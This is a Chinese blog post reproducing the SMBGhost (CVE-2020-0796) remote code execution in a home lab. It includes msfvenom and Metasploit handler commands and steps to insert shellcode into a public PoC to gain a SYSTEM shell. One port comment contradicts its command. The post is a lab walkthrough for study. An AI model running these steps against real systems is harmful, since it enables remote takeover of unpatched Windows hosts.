CVE-2020-0796(永恒之黑)漏洞复现利用GetShell

描述

北京时间2020年3月12日晚上,微软发布了一个最新到SMB远程代码执行漏洞。
SMB(Server Message Block)协议作为一种局域网文件共享传输协议,常被用来作为共享文件安全传输研究的平台。由于SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码,受黑客攻击的目标系统只要开机在线即可能被入侵。据了解,凡政府机构、企事业单位网络中采用Windows 10 1903之后的所有终端节点,如Windows家用版、专业版、企业版、教育版,Windows 10 1903 (19H1)、Windows 10 1909、 Windows Server 19H1均为潜在攻击目标,Windows 7不受影响。
被安全厂商命名为SMBGhost、EternalDarkness(“永恒之黑”)——我更喜欢ED这个称呼

影响范围

Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)

环境

靶机:windows10 1903 x64  
ip:172.16.127.134(关闭防火墙)
攻击机:MacOS ip:10.96.0.53

靶机地址:迅雷口令#X9861b84e#

漏洞检测工具:http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

POC:https://github.com/chompie1337/SMBGhost_RCE_PoC

利用

生成木马

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=8888 -b '\x00' -i 1 -f python


#-p windows/x64/meterpreter/bind_tcp 设置payload为windows64位meterpreter控制台下的正向连接




#LPORT=8888 设置开发端口为6666
#-b '\x00' 设置在生成的程序中避免出现'\x00'
#-i 1 设置编码次数为一次
#-f python 设置生成python格式文件

生成shellcode

1、将生成的shellcode全部复制

2、打开POC文件夹的exploit.py(原文件)

然后替换字符

3、打开MSF监听

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 8888
set rhost 172.16.127.134
run

4、运行exploit.py脚本

python3 exploit.py -ip 172.16.127.134

若MSF控制台暂时无反应,则control+c终端,重新输入run

参考文章:https://www.cnblogs.com/Iamyoyodan/p/13081273.html

注意

只要成功即是system,但是shellcode极度不稳定,很容易卡死,靶机蓝屏,尤其注意只能以python3去执行脚本,其他版本我尝试后直接蓝屏。
建议靶机关闭防火墙,设置NAT模式,保证两台主机在同一网段内!

Typecho赞赏功能

「一键投喂 软糖/蛋糕/布丁/牛奶/冰阔乐!」

冷夜清风

(๑>ڡ<)☆谢谢老板们的投食~

使用微信扫描二维码完成支付


添加新评论

选择表情

  TimeLine

随手分享一些知识框架...
--- updated on 2021-07-16 16:47:39 星期五

  About Me

我就是随便写写,您随便看看。
有事说事,没事烧纸,闲人勿扰,谢谢。
工作:攻防。
Tips:
1、组织:灼剑(Tsojan)安全团队。
2、问题,请直接使用真实邮箱地址回复,不然你收不到信息。

  Recent Comments

  •  Darren: 已解决
  •  Darren: 按照步骤来的,唯一的区别就是PATH变量里面多了两行,一行是D:\wim.rar\,一行是%U...
  •  Liu先生的故事小屋: 加油哦,一起努力!
  •  达布尔·道格: 在jdk16种怎么弄呢,里面的路径跟博主的不一样
  •  林: 可以加个好友吗,以后有问题想请教下,现在还是个小菜鸟
  •  君君: 点击run没反应,为什么
  •  jrdh: 请问大佬,配置环境变量的时候,文件位置在哪里?怎么找
  •  MJXT: 或者说点了没反应
  •  MJXT: 我已经安装好了可以使用,但是没办法打开汉化的那个bat文件,打开就闪退
  •  方大落: 成功安装,这是我在全网看到的最完全的安装教程,给博主点赞!

快乐地过是一天,不快乐地过也是一天,我为什么不快快乐乐地过每一天呢?

岂能尽随人愿,但求无愧我心。

在你内心深处,还有无穷的潜力,有一天当你回首看时,你就会知道这绝对是真的。

活在当下,别在怀念过去或者憧憬未来中浪费掉你现在的生活。

挫折时,要像大树一样,被砍了,还能再长;也要像杂草一样,虽让人践踏,但还能勇敢地活下去。